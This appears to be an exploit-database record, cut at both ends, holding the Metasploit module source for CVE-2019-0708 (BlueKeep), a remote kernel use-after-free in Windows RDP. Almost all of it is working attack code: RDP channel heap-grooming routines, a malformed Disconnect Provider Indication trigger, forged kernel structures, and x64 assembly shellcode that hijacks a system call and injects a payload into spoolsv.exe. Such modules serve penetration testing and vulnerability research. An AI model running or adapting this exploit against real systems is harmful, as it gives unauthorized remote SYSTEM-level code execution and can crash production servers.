rbp, [r8] ; *NormalContext is our data area pointer\n\n mov r15, [rbp+#{data_nt_kernel_addr_offset}]\n push rdx\n pop rsi ; mov rsi, rdx\n mov rbx, r9\n\n ;======================================\n ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)\n ;======================================\n xor eax, eax\n mov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)\n ; rdx is already address of baseAddr\n mov [rdx], rax ; baseAddr = 0\n mov ecx, eax\n not rcx ; ProcessHandle = -1\n mov r8, rax ; ZeroBits\n mov al, 0x40 ; eax = 0x40\n push rax ; PAGE_EXECUTE_READWRITE = 0x40\n shl eax, 6 ; eax = 0x40 << 6 = 0x1000\n push rax ; MEM_COMMIT = 0x1000\n ; reuse r9 for address of RegionSize\n mov [r9], rax ; RegionSize = 0x1000\n sub rsp, 0x20 ; shadow stack\n mov edi, #{zwallocatevirtualmemory_hash}\n call win_api_direct\n add rsp, 0x30\n\n ; check error\n test eax, eax\n jnz _kernel_kapc_routine_exit\n\n ;======================================\n ; copy userland payload\n ;======================================\n mov rdi, [rsi]\n\n;--------------------------- HACK IN EGG USER ---------\n\n push rdi\n\n lea rsi, [rel shellcode_start]\n mov rdi, 0x#{USERMODE_EGG.to_s(16)}\n\n _find_user_egg_loop:\n sub rsi, 0x#{CHUNK_SIZE.to_s(16)}\n mov rax, [rsi - 8]\n cmp rax, rdi\n jnz _find_user_egg_loop\n\n _inner_find_user_egg_loop:\n inc rsi\n mov rax, [rsi - 8]\n cmp rax, rdi\n jnz _inner_find_user_egg_loop\n\n pop rdi\n;--------------------------- END HACK EGG USER ------------\n\n mov ecx, 0x380 ; fix payload size to 0x380 bytes\n\n rep movsb\n\n ;======================================\n ; find CreateThread address (in kernel32.dll)\n ;======================================\n mov rax, [rbp+#{data_peb_addr_offset}]\n mov rax, [rax + 0x18] ; PEB->Ldr\n mov rax, [rax + 0x20] ; InMemoryOrder list\n\n ;lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\n ;mov rbx, rsi ; use rbx for iterating thread\n_find_kernel32_dll_loop:\n mov rax, [rax] ; first one always be executable\n ; offset 0x38 (WORD) => must be 0x40 (full name len c:\\windows\\system32\\kernel32.dll)\n ; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll)\n ; offset 0x50 => is name\n ; offset 0x20 => is dllbase\n ;cmp word [rax+0x38], 0x40\n ;jne _find_kernel32_dll_loop\n cmp word [rax+0x48], 0x18\n jne _find_kernel32_dll_loop\n\n mov rdx, [rax+0x50]\n ; check only \"32\" because name might be lowercase or uppercase\n cmp dword [rdx+0xc], 0x00320033 ; 3\\x002\\x00\n jnz _find_kernel32_dll_loop\n\n mov r15, [rax+0x20]\n mov edi, #{createthread_hash}\n call get_proc_addr\n\n ; save CreateThread address to SystemArgument1\n mov [rbx], rax\n\n_kernel_kapc_routine_exit:\n xor ecx, ecx\n ; clear queueing kapc flag, allow other hijacked system call to run shellcode\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\n ; restore IRQL to APC_LEVEL\n mov cl, 1\n mov cr8, rcx\n\n pop r15\n pop rsi\n pop rdi\n pop rbx\n pop rbp\n ret\n\nuserland_start_thread:\n ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)\n xchg rdx, rax ; rdx is CreateThread address passed from kernel\n xor ecx, ecx ; lpThreadAttributes = NULL\n push rcx ; lpThreadId = NULL\n push rcx ; dwCreationFlags = 0\n mov r9, rcx ; lpParameter = NULL\n lea r8, [rel userland_payload] ; lpStartAddr\n mov edx, ecx ; dwStackSize = 0\n sub rsp, 0x20\n call rax\n add rsp, 0x30\n ret\n\nuserland_payload:\n ^\n\n [\n KERNELMODE_EGG,\n assemble_with_fixups(asm)\n ].pack('<Qa*')\n end\n\n def create_free_trigger(chan_user_id, chan_id)\n # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)\n vprint_status(\"Creating free trigger for user #{chan_user_id} on channel #{chan_id}\")\n # The extra bytes on the end of the body is what causes the bad things to happen\n body = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\" + \"\\x00\" * 22\n rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)\n end\n\n def create_exploit_channel_buffer(target_addr)\n overspray_addr = target_addr + 0x2000\n shellcode_vtbl = target_addr + HEADER_SIZE\n magic_value1 = overspray_addr + 0x810\n magic_value2 = overspray_addr + 0x48\n magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE\n\n # first 0x38 bytes are used by DATA PDU packet\n # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE\n # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm\n [\n [\n # SystemResourceList (2 pointers, each 8 bytes)\n # Pointer to OWNER_ENTRY (8 bytes)\n # ActiveCount (SHORT, 2 bytes)\n # Flag (WORD, 2 bytes)\n # Padding (BYTE[4], 4 bytes) x64 only\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\n magic_value2, # OwnerThread (ULONG, 8 bytes)\n magic_value2, # TableSize (ULONG, 8 bytes)\n 0x0, # ActiveEntries (DWORD, 4 bytes)\n 0x0, # ContenttionCount (DWORD, 4 bytes)\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\n magic_value2, # Address (PVOID, 8 bytes)\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\n ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\n [\n magic_value2, # SystemResourceList (2 pointers, each 8 bytes)\n magic_value2, # --------------------\n 0x0, # Pointer to OWNER_ENTRY (8 bytes)\n 0x0, # ActiveCount (SHORT, 2 bytes)\n 0x0, # Flag (WORD, 2 bytes)\n 0x0, # Padding (BYTE[4], 4 bytes) x64 only\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\n magic_value2, # OwnerThread (ULONG, 8 bytes)\n magic_value2, # TableSize (ULONG, 8 bytes)\n 0x0, # ActiveEntries (DWORD, 4 bytes)\n 0x0, # ContenttionCount (DWORD, 4 bytes)\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\n magic_value2, # Address (PVOID, 8 bytes)\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\n ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\n [\n 0x1F, # ClassOffset (DWORD, 4 bytes)\n 0x0, # bindStatus (DWORD, 4 bytes)\n 0x72, # lockCount1 (QWORD, 8 bytes)\n magic_value3, # connection (QWORD, 8 bytes)\n shellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes)\n 0x5, # channelClass (DWORD, 4 bytes)\n \"MS_T120\\x00\".encode('ASCII'), # channelName (BYTE[8], 8 bytes)\n 0x1F, # channelIndex (DWORD, 4 bytes)\n magic_value1, # channels (QWORD, 8 bytes)\n magic_value1, # connChannelsAddr (POINTER, 8 bytes)\n magic_value1, # list1 (QWORD, 8 bytes)\n magic_value1, # list1 (QWORD, 8 bytes)\n magic_value1, # list2 (QWORD, 8 bytes)\n magic_value1, # list2 (QWORD, 8 bytes)\n 0x65756c62, # inputBufferLen (DWORD, 4 bytes)\n 0x7065656b, # inputBufferLen (DWORD, 4 bytes)\n magic_value1, # connResrouce (QWORD, 8 bytes)\n 0x65756c62, # lockCount158 (DWORD, 4 bytes)\n 0x7065656b, # dword15C (DWORD, 4 bytes)\n ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L')\n ].join('')\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb"}, {"lastseen": "2021-03-02T04:33:23", "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution. Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets. Windows 7 SP1 should be exploitable in its default configuration, assuming your target selection is correctly matched to the system's memory layout. HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2. This is a non-standard configuration for normal servers, and the target will crash if the aforementioned Registry key is not set! If the target is crashing regardless, you will likely need to determine the non-paged pool base in kernel memory and set it as the GROOMBASE option.\n", "published": "2019-09-19T11:05:08", "type": "metasploit", "title": "CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2021-02-02T10:15:46", "id": "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Exploitation and Caveats from zerosum0x0:\n#\n# 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.\n# 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)\n# 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.\n# 4. RDP has chunked messages, so we use this to groom.\n# a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.\n# b. However, on 7+, MS_T120 will not work and you have to use RDPSND.\n# i. RDPSND only works when\n# HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam = 0\n# ii. This registry key is not a default setting for server 2008 R2.\n# We should use alternate groom channels or at least detect the\n# channel in advance.\n# 5. Use chunked grooming to fit new data in the freed channel, account for\n# the allocation header size (like 0x38 I think?). At offset 0x100? is where\n# the \"call [rax]\" gadget will get its pointer from.\n# a. The NonPagedPool (NPP) starts at a fixed address on XP-7\n# i. Hot-swap memory is another problem because, with certain VMWare and\n# Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP\n# start. This can be anywhere from 100 mb to gigabytes of offset\n# before the NPP start.\n# b. Set offset 0x100 to NPPStart+SizeOfGroomInMB\n# c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need\n# [NPPStart+SizeOfGroomInMB+8...payload]... because \"call [rax]\" is an\n# indirect call\n# d. We are limited to 0x400 payloads by channel chunk max size. My\n# current shellcode is a twin shellcode with eggfinders. I spam the\n# kernel payload and user payload, and if user payload is called first it\n# will egghunt for the kernel payload.\n# 6. After channel hole is filled and the NPP is spammed up with shellcode,\n# trigger the free by closing the socket.\n#\n# TODO:\n# * Detect OS specifics / obtain memory leak to determine NPP start address.\n# * Write the XP/2003 portions grooming MS_T120.\n# * Detect if RDPSND grooming is working or not?\n# * Expand channels besides RDPSND/MS_T120 for grooming.\n# See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/\n#\n# https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming\n# MS_T120 on XP... should be same process as the RDPSND\n\nclass MetasploitModule < Msf::Exploit::Remote\n prepend Msf::Exploit::Remote::AutoCheck\n\n Rank = ManualRanking\n\n USERMODE_EGG = 0xb00dac0fefe31337\n KERNELMODE_EGG = 0xb00dac0fefe42069\n\n CHUNK_SIZE = 0x400\n HEADER_SIZE = 0x48\n\n include Msf::Exploit::Remote::RDP\n include Msf::Exploit::Remote::CheckModule\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',\n 'Description' => %q(\n The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n the freed channel is used to achieve arbitrary code execution.\n\n Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n selection is correctly matched to the system's memory layout.\n\n HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n This is a non-standard configuration for normal servers, and the target will crash if\n the aforementioned Registry key is not set!\n\n If the target is crashing regardless, you will likely need to determine the non-paged\n pool base in kernel memory and set it as the GROOMBASE option.\n ),\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 - Original exploit\n 'Ryan Hanson', # @ryHanson - Original exploit\n 'OJ Reeves <oj@beyondbinary.io>', # @TheColonial - Metasploit module\n 'Brent Cook <bcook@rapid7.com>', # @busterbcook - Assembly whisperer\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-0708'],\n ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],\n ['URL', 'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html']\n ],\n 'DefaultOptions' =>\n {\n 'RDP_CLIENT_NAME' => 'ethdev',\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep',\n 'WfsDelay' => 5\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => CHUNK_SIZE - HEADER_SIZE,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Automatic targeting via fingerprinting',\n {\n 'Arch' => [ARCH_X64],\n 'FingerprintOnly' => true\n },\n ],\n #\n #\n # Windows 2008 R2 requires the following registry change from default:\n #\n # [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\rdpwd]\n # \"fDisableCam\"=dword:00000000\n #\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8003800000,\n 'GROOMSIZE' => 100\n }\n ],\n [\n # This works with Virtualbox 6\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8002407000\n }\n ],\n [\n # This address works on VMWare 14\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8030c00000\n }\n ],\n [\n # This address works on VMWare 15\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018C00000\n }\n ],\n [\n # This address works on VMWare 15.1\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018c08000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8102407000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018c08000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8004428000\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-05-14',\n 'Notes' =>\n {\n 'AKA' => ['Bluekeep']\n }\n ))\n\n register_advanced_options(\n [\n OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),\n OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),\n OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),\n OptFloat.new('GROOMDELAY', [false, 'Delay in seconds between sending 1 MB of groom packets', 0])\n ]\n )\n end\n\n def exploit\n if target['FingerprintOnly']\n fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually. If you are targeting 2008, make sure fDisableCam=0 !')\n end\n\n begin\n rdp_connect\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\n end\n\n is_rdp, server_selected_proto = rdp_check_protocol\n unless is_rdp\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\n end\n\n # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us\n # from exploiting the target.\n if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)\n fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')\n end\n\n chans = [\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ]\n\n @mst120_chan_id = 1004 + chans.length - 1\n\n unless rdp_negotiate_security(chans, server_selected_proto)\n fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')\n end\n\n rdp_establish_session\n\n rdp_dispatch_loop\n end\n\nprivate\n\n # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is\n # received on a channel, and this is when we need to kick off our exploit.\n def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)\n # We have to do the default behaviour first.\n super(pkt, user, chan_id, flags, data)\n\n groom_size = datastore['GROOMSIZE']\n pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)\n groom_chan_count = datastore['GROOMCHANNELCOUNT']\n\n payloads = create_payloads(pool_addr)\n\n print_status(\"Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.\")\n\n target_channel_id = chan_id + 1\n\n spray_buffer = create_exploit_channel_buffer(pool_addr)\n spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)\n free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80\n\n # if the exploit is cancelled during the free, target computer will explode\n print_warning(\"<---------------- | Entering Danger Zone | ---------------->\")\n\n print_status(\"Surfing channels ...\")\n rdp_send(spray_channel * 1024)\n rdp_send(free_trigger)\n\n chan_surf_size = 0x421\n spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min\n chan_surf_packet = spray_channel * spray_packets\n chan_surf_count = chan_surf_size / spray_packets\n\n chan_surf_count.times do\n rdp_send(chan_surf_packet)\n end\n\n print_status(\"Lobbing eggs ...\")\n\n groom_mb = groom_size * 1024 / payloads.length\n\n groom_start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n\n groom_mb.times do |current_groom_count|\n tpkts = ''\n for c in 0..groom_chan_count\n payloads.each do |p|\n tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)\n end\n end\n rdp_send(tpkts)\n\n # tasks we do every 1 MB\n if current_groom_count % (1024 / payloads.length) == 0\n\n # adding mouse move events keeps the connection alive\n # (this handles a groom duration > 30 seconds, such as over Internet/VPN)\n rdp_move_mouse\n\n # simulate slow connection if GROOMDELAY is set\n if datastore['GROOMDELAY'] && datastore['GROOMDELAY'] > 0\n sleep(datastore['GROOMDELAY'])\n end\n\n groom_current_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n groom_elapsed_time = groom_current_time - groom_start_time\n groom_elapsed_str = \"%02d:%02d:%02d\" % [groom_elapsed_time / 3600,\n groom_elapsed_time / 60%60,\n groom_elapsed_time % 60]\n\n groom_mb_sent = current_groom_count / (1024 / payloads.length) + 1\n vprint_status(\"Sent #{groom_mb_sent}/#{groom_size} MB. (Time elapsed: #{groom_elapsed_str})\")\n end\n end\n\n # Terminating and disconnecting forces the USE\n print_status(\"Forcing the USE of FREE'd object ...\")\n\n # target is groomed, the early cancellation dangers are complete\n print_warning(\"<---------------- | Leaving Danger Zone | ---------------->\")\n rdp_terminate\n rdp_disconnect\n end\n\n # Helper function to create the kernel mode payload and the usermode payload with\n # the egg hunter prefix.\n def create_payloads(pool_address)\n begin\n [kernel_mode_payload, user_mode_payload].map { |p|\n [\n pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg\n p\n ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, \"\\x00\")\n }\n rescue => ex\n print_error(\"#{ex.backtrace.join(\"\\n\")}: #{ex.message} (#{ex.class})\")\n end\n end\n\n def assemble_with_fixups(asm)\n # Rewrite all instructions of form 'lea reg, [rel label]' as relative\n # offsets for the instruction pointer, since metasm's 'ModRM' parser does\n # not grok that syntax.\n lea_rel = /lea+\\s(?<dest>\\w{2,3}),*\\s\\[rel+\\s(?<label>[a-zA-Z_].*)\\]/\n asm.gsub!(lea_rel) do |match|\n match = \"lea #{$1}, [rip + #{$2}]\"\n end\n\n # metasm encodes all rep instructions as repnz\n # https://github.com/jjyg/metasm/pull/40\n asm.gsub!(/rep+\\smovsb/, 'db 0xf3, 0xa4')\n\n encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded\n\n # Fixup above rewritten instructions with the relative label offsets\n encoded.reloc.each do |offset, reloc|\n target = reloc.target.to_s\n if encoded.export.key?(target)\n # Note: this assumes the address we're fixing up is at the end of the\n # instruction. This holds for 'lea' but if there are other fixups\n # later, this might need to change to account for specific instruction\n # encodings\n if reloc.type == :i32\n instr_offset = offset + 4\n elsif reloc.type == :i16\n instr_offset = offset + 2\n end\n encoded.fixup(target => encoded.export[target] - instr_offset)\n else\n raise \"Unknown symbol '#{target}' while resolving relative offsets\"\n end\n end\n encoded.fill\n encoded.data\n end\n\n # The user mode payload has two parts. The first is an egg hunter that searches for\n # the kernel mode payload. The second part is the actual payload that's invoked in\n # user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel\n # and user mode payloads around the heap in different packets because we don't have\n # enough space to put them both in the same chunk. Given that code exec can result in\n # landing on the user land payload, the egg is used to go to a kernel payload.\n def user_mode_payload\n\n asm = %Q^\n_start:\n lea rcx, [rel _start]\n mov r8, 0x#{KERNELMODE_EGG.to_s(16)}\n_egg_loop:\n sub rcx, 0x#{CHUNK_SIZE.to_s(16)}\n sub rax, 0x#{CHUNK_SIZE.to_s(16)}\n mov rdx, [rcx - 8]\n cmp rdx, r8\n jnz _egg_loop\n jmp rcx\n ^\n egg_loop = assemble_with_fixups(asm)\n\n # The USERMODE_EGG is required at the start as well, because the exploit code\n # assumes the tag is there, and jumps over it to find the shellcode.\n [\n USERMODE_EGG,\n egg_loop,\n USERMODE_EGG,\n payload.raw\n ].pack('<Qa*<Qa*')\n end\n\n def kernel_mode_payload\n\n # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya\n #\n # This shellcode was written originally for eternalblue exploits\n # eternalblue_exploit7.py and eternalblue_exploit8.py\n #\n # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)\n #\n # Note:\n # - The userland shellcode is run in a new thread of system process.\n # If userland shellcode causes any exception, the system process get killed.\n # - On idle target with multiple core processors, the hijacked system call\n # might take a while (> 5 minutes) to get called because the system\n # call may be called on other processors.\n # - The shellcode does not allocate shadow stack if possible for minimal shellcode size.\n # This is ok because some Windows functions do not require a shadow stack.\n # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.\n # Note: the Windows 8 version macros are removed below\n # - The userland payload MUST be appened to this shellcode.\n #\n # References:\n # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)\n # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c\n\n data_kapc_offset = 0x30\n\n data_hal_original_syscall_shadow_common_offset_offset = 0x20\n data_hal_fake_syscall_spinlock_offset = 0x10\n\n data_nt_kernel_addr_offset = 0x8\n data_origin_syscall_offset = 0\n data_peb_addr_offset = -0x10\n data_queueing_kapc_offset = -0x8\n hal_heap_storage = 0xffffffffffd04100\n\n # These hashes are not the same as the ones used by the\n # Block API so they have to be hard-coded.\n createthread_hash = 0x835e515e\n keinitializeapc_hash = 0x6d195cc4\n keinsertqueueapc_hash = 0xafcc4634\n psgetcurrentprocess_hash = 0xdbf47c78\n psgetprocessid_hash = 0x170114e1\n psgetprocessimagefilename_hash = 0x77645f3f\n psgetprocesspeb_hash = 0xb818b848\n psgetthreadteb_hash = 0xcef84c3e\n spoolsv_exe_hash = 0x3ee083d8\n zwallocatevirtualmemory_hash = 0x576e99ea\n\n asm = %Q^\nshellcode_start:\n ; egg tag\n nop\n nop\n nop\n nop\n\nsetup_syscall_shadow_hook:\n ; IRQL is PASSIVE_LEVEL when got code execution\n ;int 0x3\n\n mov rbp, #{hal_heap_storage}\n\n ; allow interrupts while executing shellcode\n sti\n call r3_to_r0_start\n cli\n\n ;--------------------- HACK crappy thread cleanup --------------------\n ; This code is effectively the same as the epilogue of the function that calls\n ; the vulnerable function in the kernel, with a tweak or two.\n ; TODO: make the lock not suck!!\n mov rax, qword [gs:0x188]\n add word [rax+0x1C4], 1 ; KeGetCurrentThread()->KernelApcDisable++\n lea r11, [rsp+0b8h]\n xor eax, eax\n mov rbx, [r11+30h]\n mov rbp, [r11+40h]\n mov rsi, [r11+48h]\n mov rsp, r11\n pop r15\n pop r14\n pop r13\n pop r12\n pop rdi\n ret\n\nr3_to_r0_start:\n ; save used non-volatile registers\n push r15\n push r14\n push rdi\n push rsi\n push rbx\n push rax ; align stack by 0x10\n\n ;======================================\n ; find nt kernel address\n ;======================================\n mov r15, qword [gs:0x38] ; get IdtBase of KPCR\n mov r15, qword [r15 + 0x4] ; get ISR address\n shr r15, 0xc ; strip to page size\n shl r15, 0xc\n\n_x64_find_nt_walk_page:\n sub r15, 0x1000 ; walk along page size\n cmp word [r15], 0x5a4d ; 'MZ' header\n jne _x64_find_nt_walk_page\n\n ; save nt address for using in KernelApcRoutine\n mov [rbp+#{data_nt_kernel_addr_offset}], r15\n\n ;======================================\n ; get current EPROCESS and ETHREAD\n ;======================================\n mov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR\n mov edi, #{psgetcurrentprocess_hash}\n call win_api_direct\n xchg rcx, rax ; rcx = EPROCESS\n\n ; r15 : nt kernel address\n ; r14 : ETHREAD\n ; rcx : EPROCESS\n\n ;======================================\n ; find offset of EPROCESS.ImageFilename\n ;======================================\n mov edi, #{psgetprocessimagefilename_hash}\n call get_proc_addr\n mov eax, dword [rax+3] ; get offset from code (offset of ImageFilename is always > 0x7f)\n mov ebx, eax ; ebx = offset of EPROCESS.ImageFilename\n\n\n ;======================================\n ; find offset of EPROCESS.ThreadListHead\n ;======================================\n ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)\n ; if offset of ImageFilename is more than 0x400, current is (Win8+)\n\n cmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename\n jb _find_eprocess_threadlist_offset_win7\n add eax, 